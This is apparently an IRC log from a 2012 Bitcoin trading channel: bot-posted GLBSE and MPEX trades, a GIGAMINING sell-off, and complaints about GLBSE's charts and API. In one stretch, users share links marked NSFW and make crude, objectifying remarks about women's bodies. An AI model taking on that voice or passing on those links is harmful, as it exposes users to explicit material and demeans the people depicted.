[BITBOND] 1 @ 0.456 BTC [-] Sep 04 01:05:27 [GLBSE] [TEEK.B] 4 @ 0.948 = 3.792 BTC [+] Sep 04 01:07:24 [GLBSE] [OBSI.HRPT] 10 @ 0.10355 = 1.0355 BTC [+] Sep 04 01:08:49 [GLBSE] [JTME] 4 @ 0.9499 = 3.7996 BTC [+] Sep 04 01:10:00 [GLBSE] [OBSI.HRPT] 2 @ 0.10355 = 0.2071 BTC [+] Sep 04 01:10:43 [GLBSE] [FDBF] 7 @ 0.14999999 = 1.05 BTC [+] Sep 04 01:12:04 [GLBSE] [MU] 2 @ 0.39 = 0.78 BTC [-] Sep 04 01:12:34 [GLBSE] [KRAKEN] 20 @ 0.01 = 0.2 BTC [+] Sep 04 01:13:46 [GLBSE] [FPGAMINING] 4 @ 0.799 = 3.196 BTC [+] Sep 04 01:13:51 [GLBSE] [DMC] 1 @ 0.08899 BTC [+] Sep 04 01:14:51 [GLBSE] [TEEK.B] 3 @ 0.949 = 2.847 BTC [+] Sep 04 01:14:52 [GLBSE] [TEEK.B] 5 @ 0.964 = 4.82 BTC [+] Sep 04 01:14:54 [GLBSE] [TEEK.B] 1 @ 0.965 BTC [+] Sep 04 01:33:14 [GLBSE] [DMC] 1 @ 0.071 BTC [-] Sep 04 01:33:15 [GLBSE] [DMC] 4 @ 0.07 = 0.28 BTC [-] Sep 04 01:43:29 usagi yes, it is called liquidity. Sep 04 01:43:46 can't blame you for going a little nuts if you've never seen it before. Sep 04 01:47:47 [MPEX] [F.GIGA.ETF] 7600 @ 0.00085519 = 6.4994 BTC [+] Sep 04 01:49:46 [GLBSE] [MMM] 40 @ 0.9 = 36 BTC [+] Sep 04 01:57:34 [GLBSE] [ARS] 40 @ 0.0147 = 0.588 BTC [-] Sep 04 02:02:09 [GLBSE] [GIGAMINING] 6 @ 0.8252 = 4.9512 BTC [-] Sep 04 02:02:31 [GLBSE] [GIGAMINING] 45 @ 0.8251 = 37.1295 BTC [-] Sep 04 02:03:03 [GLBSE] [GIGAMINING] 1 @ 0.825 BTC [-] Sep 04 02:03:31 [GLBSE] [GIGAMINING] 1 @ 0.821 BTC [-] Sep 04 02:03:33 [GLBSE] [GIGAMINING] 5 @ 0.821 = 4.105 BTC [-] Sep 04 02:03:52 [GLBSE] [GIGAMINING] 5 @ 0.820201 = 4.101 BTC [-] Sep 04 02:04:19 [GLBSE] [GIGAMINING] 1 @ 0.820201 BTC [-] Sep 04 02:04:20 [GLBSE] [GIGAMINING] 5 @ 0.820101 = 4.1005 BTC [-] Sep 04 02:04:22 [GLBSE] [GIGAMINING] 3 @ 0.82 = 2.46 BTC [-] Sep 04 02:04:50 [GLBSE] [GIGAMINING] 6 @ 0.82 = 4.92 BTC [-] Sep 04 02:04:51 [GLBSE] [GIGAMINING] 4 @ 0.814 = 3.256 BTC [-] Sep 04 02:05:08 [GLBSE] [OBSI.HRPT] 1 @ 0.1032 BTC [-] Sep 04 02:05:10 [GLBSE] [GIGAMINING] 5 @ 0.814 = 4.07 BTC [-] Sep 04 02:05:11 [GLBSE] [GIGAMINING] 25 @ 0.81311 = 20.3278 BTC [-] Sep 04 02:05:12 [GLBSE] [GIGAMINING] 9 @ 0.813 = 7.317 BTC [-] Sep 04 02:05:13 [GLBSE] [GIGAMINING] 3 @ 0.811 = 2.433 BTC [-] Sep 04 02:05:15 [GLBSE] [GIGAMINING] 8 @ 0.801 = 6.408 BTC [-] Sep 04 02:05:42 [GLBSE] [OBSI.HRPT] 2 @ 0.1035499 = 0.2071 BTC [+] Sep 04 02:05:56 [GLBSE] [GIGAMINING] 1 @ 0.801 BTC [-] Sep 04 02:05:57 [GLBSE] [GIGAMINING] 7 @ 0.8 = 5.6 BTC [-] Sep 04 02:05:58 [GLBSE] [GIGAMINING] 9 @ 0.791 = 7.119 BTC [-] Sep 04 02:05:59 [GLBSE] [GIGAMINING] 1 @ 0.7901 BTC [-] Sep 04 02:06:00 [GLBSE] [GIGAMINING] 11 @ 0.79 = 8.69 BTC [-] Sep 04 02:06:01 [GLBSE] [GIGAMINING] 1 @ 0.78 BTC [-] Sep 04 02:06:21 [GLBSE] [GIGAMINING] 20 @ 0.78 = 15.6 BTC [-] Sep 04 02:07:15 [GLBSE] [GIGAMINING] 4 @ 0.75 = 3 BTC [-] Sep 04 02:07:17 [GLBSE] [GIGAMINING] 7 @ 0.73 = 5.11 BTC [-] Sep 04 02:07:17 [GLBSE] [GIGAMINING] 3 @ 0.72 = 2.16 BTC [-] Sep 04 02:07:18 [GLBSE] [GIGAMINING] 4 @ 0.711 = 2.844 BTC [-] Sep 04 02:09:09 [MPEX] [F.GIGA.ETF] 7368 @ 0.00085662 = 6.3116 BTC [+] Sep 04 02:09:11 [MPEX] [F.GIGA.ETF] 19237 @ 0.0008259 = 15.8878 BTC [-] Sep 04 02:09:12 [MPEX] [F.GIGA.ETF] 15600 @ 0.00081834 = 12.7661 BTC [-] Sep 04 02:09:14 [MPEX] [F.GIGA.ETF] 14600 @ 0.00081753 = 11.9359 BTC [-] Sep 04 02:09:15 [MPEX] [F.GIGA.ETF] 11710 @ 0.00080409 = 9.4159 BTC [-] Sep 04 02:09:15 [MPEX] [F.GIGA.ETF] 15829 @ 0.00079485 = 12.5817 BTC [-] Sep 04 02:09:16 [MPEX] [F.GIGA.ETF] 5656 @ 0.00078324 = 4.43 BTC [-] Sep 04 02:09:45 [MPEX] [F.GIGA.ETF] 18044 @ 0.00078324 = 14.1328 BTC [-] Sep 04 02:09:47 [MPEX] [F.GIGA.ETF] 7097 @ 0.00078132 = 5.545 BTC [-] Sep 04 02:09:48 "DUMP ALL THE GIGAMINING!" said the internet meme. Sep 04 02:09:48 [MPEX] [F.GIGA.ETF] 12800 @ 0.0007757 = 9.929 BTC [-] Sep 04 02:09:49 [MPEX] [F.GIGA.ETF] 14219 @ 0.00076777 = 10.9169 BTC [-] Sep 04 02:09:50 [MPEX] [F.GIGA.ETF] 2840 @ 0.00075382 = 2.1408 BTC [-] Sep 04 02:10:44 [MPEX] [F.GIGA.ETF] 2560 @ 0.00075382 = 1.9298 BTC [-] Sep 04 02:10:45 [MPEX] [F.GIGA.ETF] 14016 @ 0.00075354 = 10.5616 BTC [-] Sep 04 02:11:46 Looks like it's going down the drain. What's the news about that? Sep 04 02:12:29 [GLBSE] [PUREMINING] 5 @ 0.0942 = 0.471 BTC [+] Sep 04 02:15:06 [MPEX] [F.GIGA.ETF] 25000 @ 0.00071 = 17.75 BTC [-] Sep 04 02:15:07 [MPEX] [F.GIGA.ETF] 150000 @ 0.0007 = 105 BTC [-] Sep 04 02:15:08 [MPEX] [F.GIGA.ETF] 75000 @ 0.00069 = 51.75 BTC [-] Sep 04 02:15:22 !ticker f.giga.etf Sep 04 02:15:24 !ticker gigamining Sep 04 02:15:24 [MPEX:F.GIGA.ETF] 1day: 0.00069 / 0.00077074 / 0.00086192 (593244 shares, 457.24 BTC), 30day: 0.00064789 / 0.00096382 / 0.00115139 (9201962 shares, 8,869.07 BTC) Sep 04 02:15:28 [GLBSE:GIGAMINING] [Bid: 0.711] [Ask: 0.8409] [Spread: 0.1299] [Last: 0.711] [24hVol: 600.15089409] [7dAvg: 0.84742098] Sep 04 02:15:32 Goodbye Gigamining =/ Sep 04 02:15:44 Some huge dumps Sep 04 02:15:55 [MPEX] [F.GIGA.ETF] 3850 @ 0.00069 = 2.6565 BTC [-] Sep 04 02:16:17 Let's see what gets purchased now... Sep 04 02:16:21 [MPEX] [F.GIGA.ETF] 13 @ 0.00069 = 0.009 BTC [-] Sep 04 02:17:36 [MPEX] [B.MPCD.C] 18800 @ 0.00103 = 19.364 BTC [+] Sep 04 02:19:54 [MPEX] [S.DICE] 4000 @ 0.0034 = 13.6 BTC [+] Sep 04 02:23:31 [MPEX] [F.GIGA.ETF] 3200 @ 0.00069 = 2.208 BTC [-] Sep 04 02:28:13 [MPEX] [F.GIGA.ETF] 15000 @ 0.00069 = 10.35 BTC [-] Sep 04 02:29:24 [GLBSE] [BMMO] 2 @ 0.099 = 0.198 BTC [-] Sep 04 02:29:44 [GLBSE] [BITBOND] 1 @ 0.41000003 BTC [-] Sep 04 02:29:45 [GLBSE] [BITBOND] 5 @ 0.41000002 = 2.05 BTC [-] Sep 04 02:29:47 [GLBSE] [BITBOND] 9 @ 0.41 = 3.69 BTC [-] Sep 04 02:29:48 [GLBSE] [NYAN.B] 3 @ 1 = 3 BTC [+] Sep 04 02:30:36 [GLBSE] [DMC] 6 @ 0.07 = 0.42 BTC [-] Sep 04 02:30:48 [GLBSE] [BITBOND] 9 @ 0.386 = 3.474 BTC [-] Sep 04 02:31:05 [GLBSE] [NYAN.A] 8 @ 1.01 = 8.08 BTC [+] Sep 04 02:31:32 [GLBSE] [MOORE] 1 @ 0.5005 BTC [-] Sep 04 02:31:34 [GLBSE] [MOORE] 10 @ 0.5 = 5 BTC [-] Sep 04 02:33:17 [GLBSE] [NYAN.C] 4 @ 0.74 = 2.96 BTC [+] Sep 04 02:37:47 [MPEX] [S.MPOE] 200 @ 0.0003926 = 0.0785 BTC [-] Sep 04 02:37:49 [MPEX] [S.MPOE] 42136 @ 0.00039285 = 16.5531 BTC [+] Sep 04 02:37:50 [MPEX] [S.MPOE] 6764 @ 0.00039416 = 2.6661 BTC [+] Sep 04 02:40:28 [GLBSE] [BFLS] 1 @ 1 BTC [-] Sep 04 02:40:30 [GLBSE] [DMC] 1 @ 0.07 BTC [-] Sep 04 02:41:15 [GLBSE] [BFLS.RIG] 1 @ 0.948598 BTC [+] Sep 04 02:51:44 [GLBSE] [TYGRR.BOND-P] 8 @ 0.11 = 0.88 BTC [+] Sep 04 02:51:47 [GLBSE] [RAREEARTH] 80 @ 0.0096 = 0.768 BTC [+] Sep 04 02:54:51 [GLBSE] [PPT.B] 50 @ 0.301 = 15.05 BTC [-] Sep 04 02:54:53 [GLBSE] [PPT.B] 7 @ 0.3001 = 2.1007 BTC [-] Sep 04 02:54:54 [GLBSE] [PPT.B] 19 @ 0.30001 = 5.7002 BTC [-] Sep 04 02:54:55 [GLBSE] [PPT.B] 2 @ 0.30001 = 0.6 BTC [-] Sep 04 02:54:57 [GLBSE] [PPT.B] 10 @ 0.300001 = 3 BTC [-] Sep 04 02:54:57 [GLBSE] [PPT.B] 100 @ 0.3 = 30 BTC [-] Sep 04 02:55:52 [GLBSE] [PPT.A] 80 @ 0.31 = 24.8 BTC [-] Sep 04 02:57:50 [GLBSE] [PPT.E] 165 @ 0.32 = 52.8 BTC [-] Sep 04 02:59:13 !ticker GSDPT Sep 04 02:59:18 [GLBSE:GSDPT] [Bid: 0.003015] [Ask: 0.003393] [Spread: 0.000378] [Last: 0.0028] [24hVol: 93.5888362] [7dAvg: 0.00327638] Sep 04 02:59:34 tier 2 sponsorship is now available for bitcoin2012 Sep 04 02:59:48 awesome Sep 04 02:59:52 first 5 spots get £70 discount Sep 04 02:59:56 when is GLBSE going to be usable? Sep 04 03:00:01 lol Sep 04 03:00:04 soon Sep 04 03:00:09 seriously though Sep 04 03:00:13 every time you say that Sep 04 03:00:15 new charts are on the way Sep 04 03:00:18 we believe you a little less Sep 04 03:00:22 because it IS going to be soon Sep 04 03:00:40 but carry on with your more important shit Sep 04 03:00:43 http://67.222.146.58:9999/asset/view/BITBOND Sep 04 03:00:47 look here Sep 04 03:00:53 like getting all teh dumbest bitcoiners together :) Sep 04 03:01:06 teh? Sep 04 03:01:13 teh dumberist? Sep 04 03:01:21 nefario: how about that refund Sep 04 03:01:27 lol Sep 04 03:01:30 BANE!!!!! Sep 04 03:01:42 also Sep 04 03:01:45 no refunds Sep 04 03:01:49 You Sep 04 03:01:55 said you would give me one Sep 04 03:02:02 over email Sep 04 03:02:13 are you sure? Sep 04 03:02:16 Emanuel Sep 04 03:02:18 That's my name Sep 04 03:02:39 oh my mistake Sep 04 03:02:44 Yeah, I see that policy Sep 04 03:02:47 Sorry. Sep 04 03:03:46 dub: opinion on the new version of charts? Sep 04 03:04:00 run from memory so it's lightning fast Sep 04 03:04:03 I hope Sep 04 03:04:36 Nefario, are you going to hide frozen assets/expired assets from the market? Sep 04 03:04:55 you talking about pass throughs? Sep 04 03:05:02 PPT's? Sep 04 03:05:11 passthrough, scams, etc. Sep 04 03:05:15 dmc... Sep 04 03:05:19 Anything expired/frozen Sep 04 03:05:26 Which cannot be traded Sep 04 03:05:34 have you got a list? Sep 04 03:05:53 also Sep 04 03:05:57 opinion on this Sep 04 03:05:57 http://67.222.146.58:9999/asset/view/BITBOND Sep 04 03:06:01 hover over a price Sep 04 03:06:07 on the chart Sep 04 03:06:13 should give it to ya Sep 04 03:06:19 nefario: fugly Sep 04 03:06:30 why fuck up the bid/ask like that? Sep 04 03:06:48 price is not showing in opera Sep 04 03:06:51 only vol Sep 04 03:07:06 kakobrekla: thats too bad Sep 04 03:07:12 [GLBSE] [ASICMINER] 5 @ 0.1438 = 0.719 BTC [+] Sep 04 03:07:19 I've got a fast fix for that though Sep 04 03:07:25 love your priorities though Sep 04 03:07:27 stop using glbse Sep 04 03:07:29 k Sep 04 03:07:32 give me a second Sep 04 03:07:38 while you download firefox Sep 04 03:07:45 lol Sep 04 03:07:51 gaying up the charts is clearly more important that sub-minute page loads Sep 04 03:08:32 dub, the backend for the new charts is really fast Sep 04 03:08:38 the charts are only the lipstick Sep 04 03:08:43 the new thing is the backend Sep 04 03:08:45 fast but it doesnt work. Sep 04 03:08:47 o hey, fixed the order book so it looks sane now. well done nefario. Sep 04 03:08:53 in OPERA Sep 04 03:08:55 which means it works Sep 04 03:09:01 (it still takes ~1 minute) Sep 04 03:09:13 dub, I think the data for the charts was already loading in full anyway. Sep 04 03:09:30 reallyhmmm Sep 04 03:09:36 need to talk to rg Sep 04 03:09:44 since it's on his service that Im running this Sep 04 03:09:49 The javascript to display probably changed, only that. Shouldn't make much of a difference, that's processed by your computer anyway. Sep 04 03:10:37 also some interesting new Sep 04 03:10:39 news Sep 04 03:11:00 Never, it's a broker Sep 04 03:11:12 Your interface is like a stock market backend. Sep 04 03:11:13 nefario: do you exclusively use an ipad to access the itnernet? Sep 04 03:11:24 no! Sep 04 03:11:30 I use a toshiba satelite now Sep 04 03:11:33 :D Sep 04 03:11:36 Namworld right-o. Sep 04 03:11:45 with the death of my last notebook Sep 04 03:11:49 had to get a new one Sep 04 03:11:51 although Sep 04 03:12:09 I expect this is leading to another dig from dub about the site Sep 04 03:12:26 tooltips work Sep 04 03:12:32 hover over the graph Sep 04 03:12:40 will give you the price and date Sep 04 03:12:44 there's a graph ? Sep 04 03:12:48 i don't see a graph ? Sep 04 03:12:49 date is currently foobar Sep 04 03:13:11 well it might not be blazing fast, but at least it gets a bit faster each time it gets a bit heavier on each page. Somehow... Sep 04 03:13:20 also Sep 04 03:13:23 So I suppose the speed is improving Sep 04 03:13:24 will be adding a slider Sep 04 03:13:39 to limit what trades are shown Sep 04 03:13:52 set the slider to the price you want Sep 04 03:14:02 and it will only show trades under that price in the graph Sep 04 03:14:29 fixing the single trade at high price graph foobar stuff Sep 04 03:15:29 http://browsershots.org/http://67.222.146.58:9999/asset/view/BITBOND Sep 04 03:15:33 well the site mostly doesn't load. Sep 04 03:15:44 when it does load i see a hole and then the volume graph. Sep 04 03:17:22 also adding live streaming soon as well, using websocket, for new orders, trades, dividends etc. Sep 04 03:17:32 [GLBSE] [BAKEWELL] 5 @ 0.15 = 0.75 BTC Sep 04 03:19:24 http://api.browsershots.org/png/original/64/64f1bc22d6d0a33c6f7dad7fb9f2a247.png o hey, in seamonkey it does work. okay. Sep 04 03:20:36 Works from here in firefox Sep 04 03:20:39 I don't like the new orderbook display however. Sep 04 03:22:02 why not ? Sep 04 03:22:20 Namworld: we'll be adding live streaming of new orders as they are made Sep 04 03:22:34 you'll be able to have a bot sit there waiting Sep 04 03:22:36 [GLBSE] [BAKEWELL] 1 @ 0.15 BTC Sep 04 03:23:09 ordering the bids over the ask like that, I just don't like it. Takes too much space Sep 04 03:23:19 I prefer to have them side by side like it is now Sep 04 03:24:08 there are two kinds of space Sep 04 03:24:17 vertical and horizontal Sep 04 03:24:28 this takes up less horizontal Sep 04 03:24:43 also limits the number of bids to 10 shown Sep 04 03:25:21 [GLBSE] [DMC] 5 @ 0.07 = 0.35 BTC [-] Sep 04 03:25:37 What if I want to see all the bids/asks? Sep 04 03:26:01 API Sep 04 03:26:05 or Sep 04 03:26:19 we might have a separate page for all bids and asks Sep 04 03:26:52 when will you be fixin the api Sep 04 03:27:53 [GLBSE] [ASICMINER] 50 @ 0.14 = 7 BTC [-] Sep 04 03:29:53 kakobrekla: SOON Sep 04 03:30:26 hm Sep 04 03:30:27 kakobrekla: whats wrong with the API? Sep 04 03:30:47 i need tranfers from acc to acc and souch Sep 04 03:30:51 right after the inaugural bitcoin sticky biscuit convention Sep 04 03:31:12 you've played that game? Sep 04 03:31:21 I thought it was only legend Sep 04 03:32:16 nefario https://bitcointalk.org/index.php?topic=104649.msg1154749#msg1154749 Sep 04 03:32:40 also this makes it the third time Sep 04 03:33:12 [GLBSE] [SILVER] 1 @ 0.01 BTC [+] Sep 04 03:35:25 kakobrekla: I don't know if I want to add transfers to the API Sep 04 03:35:38 at least not yet Sep 04 03:35:45 why Sep 04 03:35:46 have you hooked it up to mtgox yet? Sep 04 03:36:02 tux even coded me a private api Sep 04 03:37:09 [GLBSE] [GIGAMINING] 4 @ 0.722 = 2.888 BTC [+] Sep 04 03:37:10 [GLBSE] [GIGAMINING] 4 @ 0.721 = 2.884 BTC [-] Sep 04 03:37:12 [GLBSE] [GIGAMINING] 5 @ 0.72 = 3.6 BTC [-] Sep 04 03:37:13 [GLBSE] [GIGAMINING] 15 @ 0.712 = 10.68 BTC [-] Sep 04 03:37:14 [GLBSE] [GIGAMINING] 4 @ 0.711 = 2.844 BTC [-] Sep 04 03:37:45 I'll see what I can do. Sep 04 03:37:48 [GLBSE] [GIGAMINING] 1 @ 0.711 BTC [-] Sep 04 03:37:53 k Sep 04 03:38:11 [GLBSE] [GIGAMINING] 1 @ 0.7 BTC [-] Sep 04 03:43:11 Bonjour Transisto Sep 04 03:53:16 [GLBSE] [NYAN.C] 1 @ 0.74 BTC [+] Sep 04 03:55:04 [GLBSE] [MU] 1 @ 0.39 BTC [-] Sep 04 03:55:47 [GLBSE] [FDBF] 2 @ 0.14999999 = 0.3 BTC [+] Sep 04 03:57:29 [GLBSE] [GIGAMINING] 1 @ 0.672 BTC [-] Sep 04 03:59:23 [GLBSE] [GIGAMINING] 1 @ 0.671 BTC [-] Sep 04 04:01:09 [GLBSE] [OBSI.HRPT] 15 @ 0.1033 = 1.5495 BTC [-] Sep 04 04:03:20 [GLBSE] [FPGA.CONTRACT] 18 @ 0.078 = 1.404 BTC [-] Sep 04 04:04:58 [GLBSE] [GIGAMINING] 1 @ 0.839999 BTC [+] Sep 04 04:09:52 [GLBSE] [ASICMINER] 30 @ 0.137 = 4.11 BTC [-] Sep 04 04:14:16 [GLBSE] [GSDPT] 300 @ 0.003015 = 0.9045 BTC [+] Sep 04 04:14:50 [GLBSE] [GSDPT] 25 @ 0.003015 = 0.0754 BTC [+] Sep 04 04:29:16 [GLBSE] [BITCOINRS] 2 @ 0.05 = 0.1 BTC [-] Sep 04 04:30:32 [GLBSE] [PUREMINING] 3 @ 0.0942 = 0.2826 BTC [+] Sep 04 04:31:20 [GLBSE] [PUREMINING] 1 @ 0.0956 BTC [+] Sep 04 04:35:43 [GLBSE] [OBSI.HRPT] 5 @ 0.1033 = 0.5165 BTC [-] Sep 04 04:42:11 !ticker GSDPT Sep 04 04:42:16 [GLBSE:GSDPT] [Bid: 0.003015] [Ask: 0.00338] [Spread: 0.000365] [Last: 0.003015] [24hVol: 94.5687112] [7dAvg: 0.00327145] Sep 04 04:50:27 [GLBSE] [YARR] 3 @ 1.063 = 3.189 BTC [+] Sep 04 04:50:28 [GLBSE] [YARR] 97 @ 1.0625 = 103.0625 BTC [-] Sep 04 04:50:29 [GLBSE] [FDBF] 18 @ 0.14999999 = 2.7 BTC [+] Sep 04 04:51:11 [GLBSE] [OBSI.HRPT] 10 @ 0.1033 = 1.033 BTC [-] Sep 04 04:51:29 [GLBSE] [OBSI.1MHS] 123 @ 0.0899 = 11.0577 BTC [-] Sep 04 04:51:30 [GLBSE] [OBSI.1MHS] 1 @ 0.09 BTC [+] Sep 04 04:51:31 [GLBSE] [OBSI.1MHS] 79 @ 0.091 = 7.189 BTC [+] Sep 04 04:51:32 [GLBSE] [OBSI.1MHS] 159 @ 0.09379999 = 14.9142 BTC [+] Sep 04 04:51:33 [GLBSE] [OBSI.1MHS] 10 @ 0.094 = 0.94 BTC [+] Sep 04 04:51:34 [GLBSE] [OBSI.1MHS] 4 @ 0.099 = 0.396 BTC [+] Sep 04 04:51:36 [GLBSE] [OBSI.1MHS] 10 @ 0.09989 = 0.9989 BTC [+] Sep 04 04:51:53 !ticker s.dice Sep 04 04:51:55 !ticker gsdpt Sep 04 04:51:55 [MPEX:S.DICE] 1day: 0.0034 / 0.0034 / 0.0034 (102487 shares, 348.46 BTC), 30day: 0.0032 / 0.0032717 / 0.0034 (3507500 shares, 11,475.50 BTC) Sep 04 04:52:20 [GLBSE:GSDPT] [Bid: 0.003015] [Ask: 0.00338] [Spread: 0.000365] [Last: 0.003015] [24hVol: 94.5687112] [7dAvg: 0.00327145] Sep 04 04:53:07 !ticker f.giga.etf Sep 04 04:53:08 !ticker f.giga.etf Sep 04 04:53:09 [MPEX:F.GIGA.ETF] 1day: 0.00069 / 0.00076477 / 0.00086192 (590307 shares, 451.45 BTC), 30day: 0.00064789 / 0.00096316 / 0.00115139 (9224025 shares, 8,884.30 BTC) Sep 04 04:53:09 !ticker gigamining Sep 04 04:53:09 [MPEX:F.GIGA.ETF] 1day: 0.00069 / 0.00076477 / 0.00086192 (590307 shares, 451.45 BTC), 30day: 0.00064789 / 0.00096316 / 0.00115139 (9224025 shares, 8,884.30 BTC) Sep 04 04:53:11 [GLBSE:GIGAMINING] [Bid: 0.79] [Ask: 0.8399] [Spread: 0.0499] [Last: 0.839999] [24hVol: 482.52399329] [7dAvg: 0.84155518] Sep 04 04:53:57 [GLBSE] [BMMO] 27 @ 0.075 = 2.025 BTC [-] Sep 04 04:53:59 [GLBSE] [BMMO] 4 @ 0.070001 = 0.28 BTC [-] Sep 04 04:54:00 [GLBSE] [BMMO] 175 @ 0.07 = 12.25 BTC [-] Sep 04 04:54:07 "then they, ya know, gently shove it in" Sep 04 04:54:24 sounds kinky Sep 04 04:55:03 Obsi: it's a quote of adam curry talking about how he thinks the media programs your brain Sep 04 04:55:49 ;;bc,24hprc Sep 04 04:55:50 10.36 Sep 04 04:55:58 ;;ticker Sep 04 04:55:59 Best bid: 10.42001, Best ask: 10.5, Bid-ask spread: 0.07999, Last trade: 10.5, 24 hour volume: 22779, 24 hour low: 10.08889, 24 hour high: 10.5934 Sep 04 04:56:31 low volume Sep 04 04:56:41 been low for a while now. Sep 04 04:57:18 I take that as bullish Sep 04 04:57:32 This is a nice channel, no one spams Sep 04 04:58:14 anyway, I'm going to head on Sep 04 04:58:28 Have fun watching assbot Sep 04 04:58:53 he he he ... ass Sep 04 04:59:15 lol Sep 04 04:59:23 kakobrekla the bot really needs a website somewhere Sep 04 04:59:31 so that inquiring minds can check out its ass Sep 04 04:59:32 ets. Sep 04 04:59:40 :) Sep 04 05:00:19 [GLBSE] [FPGAMINING] 1 @ 0.79 BTC [-] Sep 04 05:03:16 _that_ass_ Sep 04 05:03:50 mircea_popescu: encyclopediabitcoinica.com/wiki/Assbot coming soon Sep 04 05:04:02 haha cool Sep 04 05:04:03 (i need a good pic, i'm sure you can help out) Sep 04 05:04:10 hmm Sep 04 05:04:38 http://polimedia.us/dtng/c/res/3553.html or http://polimedia.us/dtng/c/res/767.html Sep 04 05:04:41 pick & choose. Sep 04 05:05:29 nice, a whole thread Sep 04 05:06:11 hi Sep 04 05:07:15 hiya jcpham :) Sep 04 05:07:59 [MPEX] [F.GIGA.ETF] 2768 @ 0.00078764 = 2.1802 BTC [+] Sep 04 05:08:20 I vote for: http://polimedia.us/dtng/c/src/133371961864.jpg (NSFW) Sep 04 05:08:52 what a milkly white ass she has Sep 04 05:10:51 obsi is a girl that has a taste for ass ?! Sep 04 05:11:01 and that IS a nice ass too Sep 04 05:11:15 [GLBSE] [BTCWEB] 5 @ 0.109 = 0.545 BTC [+] Sep 04 05:12:25 Obsi: i may have to go for that one, i doube that admin will go for anything with actual naughty bits showing Sep 04 05:12:30 wow I think I found the definition of BADONKADONK http://polimedia.us/dtng/c/src/128235540939.jpg (NSFW) Sep 04 05:12:54 that's pretty bad oink :D Sep 04 05:13:07 oh my Sep 04 05:13:32 it reminds me of this bed that got broken when i was a kid. Sep 04 05:15:15 plus, nothing says assbot like and ass of that ... 'stature' Sep 04 05:15:27 er Sep 04 05:15:34 re the badonkadon Sep 04 05:16:55 yeah that ass really says "ass" Sep 04 05:18:27 i guess that's it then. Sep 04 05:18:43 [GLBSE] [METAL.SILVER] 5 @ 0.099999 = 0.5 BTC [+] Sep 04 05:19:11 [MPEX] [S.MPOE] 13800 @ 0.00039143 = 5.4017 BTC [-] Sep 04 05:19:13 [MPEX] [S.MPOE] 16236 @ 0.00039416 = 6.3996 BTC [+] Sep 04 05:19:14 [MPEX] [S.MPOE] 5564 @ 0.00039478 = 2.1966 BTC [+] Sep 04 05:20:25 well, it's a good end to the beginning Sep 04 05:20:27 http://www.encyclopediabitcoinica.com/wiki/Assbot Sep 04 05:21:14 That makes me have a strange attraction to assbot now Sep 04 05:22:30 lol desire for ass Sep 04 05:22:32 istance. Sep 04 05:23:05 mircea_popescu: in consideration of your statement, i'll route you to http://www.encyclopediabitcoinica.com/wiki/User:Smickles Sep 04 05:23:19 randiom page --> http://www.encyclopediabitcoinica.com/wiki/Mircea_Popescu Sep 04 05:23:29 every time ! Sep 04 05:23:45 random page == mircea_popescu Sep 04 05:24:01 :D I'm rich! Sep 04 05:24:07 you should prolly do obsi nao Sep 04 05:24:31 [GLBSE] [COGNITIVE] 3 @ 0.61 = 1.83 BTC [-] Sep 04 05:24:32 [GLBSE] [COGNITIVE] 6 @ 0.6001 = 3.6006 BTC [-] Sep 04 05:24:33 [GLBSE] [COGNITIVE] 25 @ 0.6 = 15 BTC [-] Sep 04 05:24:34 [GLBSE] [COGNITIVE] 36 @ 0.55 = 19.8 BTC [-] Sep 04 05:24:35 oh shit, there's a solidcoin page now Sep 04 05:24:35 [GLBSE] [MMM] 2 @ 0.9 = 1.8 BTC [+] Sep 04 05:24:39 Bitcoinica is a "Bitcoin Faucet" style free bitcoin giveaway site. Instead of a captcha to get your free bitcoins, you have to hack the site. This is much easier than any captcha however. Sep 04 05:24:40 ahahaha Sep 04 05:25:35 The hacker was successful able to access an email server. This gave the attacker access to info@bitcoinica.com which in turn allowed them to reset passwords with our hosting provider, Rackspace. Sep 04 05:25:36 lulzy. Sep 04 05:26:29 "Soiledcoins are printed out of thin air and stored in the clouds" Lloolololllo Sep 04 05:26:53 this site is generally brilliant Sep 04 05:28:02 lmao so on bitcoinica site Sep 04 05:28:05 if i click open claim Sep 04 05:28:10 https://claims.bitcoinica.com/ Could not connect to remote server Sep 04 05:28:10 You tried to access the address https://claims.bitcoinica.com/, which is currently unavailable. Sep 04 05:28:20 dun dun dun Sep 04 05:33:12 http://www.encyclopediabitcoinica.com/wiki/Main:Current_events :D Sep 04 05:33:32 ^explains all the goatse Sep 04 05:35:06 [GLBSE] [MMM] 3 @ 0.9 = 2.7 BTC [+] Sep 04 05:45:03 you think it actually is pirate ? Sep 04 05:45:13 [GLBSE] [JLP-BMD] 24 @ 0.09499 = 2.2798 BTC [-] Sep 04 05:45:42 [GLBSE] [JLP-BMD] 1 @ 0.09499 BTC [-] Sep 04 05:47:18 omfg. Sep 04 05:47:19 http://www.namworld.com/ Sep 04 05:47:31 this has got to go into the wiki. Sep 04 05:47:35 i was wondering if it was pirate before Sep 04 05:47:37 this guy has better css skills than mine Sep 04 05:47:46 Lol Sep 04 05:49:02 I'm on the go bitches Sep 04 05:49:06 Except it's unrelated to bitcoins? Sep 04 05:49:22 Namworld well you're the relation Sep 04 05:49:41 eh, then do it about me? Sep 04 05:50:20 Although, yes. I should definitly work on that design. Sep 04 05:50:34 i wouldn't touch it. it's incredible as it is. Sep 04 05:50:42 why make more bootstrap sites ? Sep 04 05:51:15 Dave Weiner likes bootstrap Sep 04 05:51:25 meh at bootstrap Sep 04 05:51:34 I have my own css/grid system Sep 04 05:52:47 Damn, just got goatse'd on mobile Sep 04 05:53:28 lmao Sep 04 05:54:38 http://polimedia.us/dtng/c/src/134672677419.jpg i really like this pic Sep 04 05:54:41 shit, had to shut that off Sep 04 05:54:57 got goatse'd 4 more times in 3 seconds Sep 04 05:55:35 i never got it. Sep 04 05:56:28 Maybe you're not in the otc? Sep 04 05:56:30 Nope Sep 04 05:56:45 Bot spy must not be in this channel Sep 04 05:57:04 Relaying your name to the infinite goatse spam bots Sep 04 05:57:19 yeah Sep 04 05:57:28 it has to be in this chan Sep 04 05:57:29 not being in otc is smarter and smarter. Sep 04 05:57:41 smickles|m was only in this chan Sep 04 05:57:49 [MPEX] [S.MPOE] 200 @ 0.00039109 = 0.0782 BTC [-] Sep 04 05:57:51 [MPEX] [S.MPOE] 59385 @ 0.00039081 = 23.2083 BTC [-] Sep 04 05:57:53 hmm odd Sep 04 05:57:56 oh wai Sep 04 05:57:59 t Sep 04 05:58:05 it was in -otc too Sep 04 05:58:09 :p Sep 04 05:58:25 well ok, im off to sleep. take care all! Sep 04 05:58:31 nn Sep 04 06:00:01 goodbye Sep 04 06:01:50 [GLBSE] [FPGAMINING] 4 @ 0.74 = 2.96 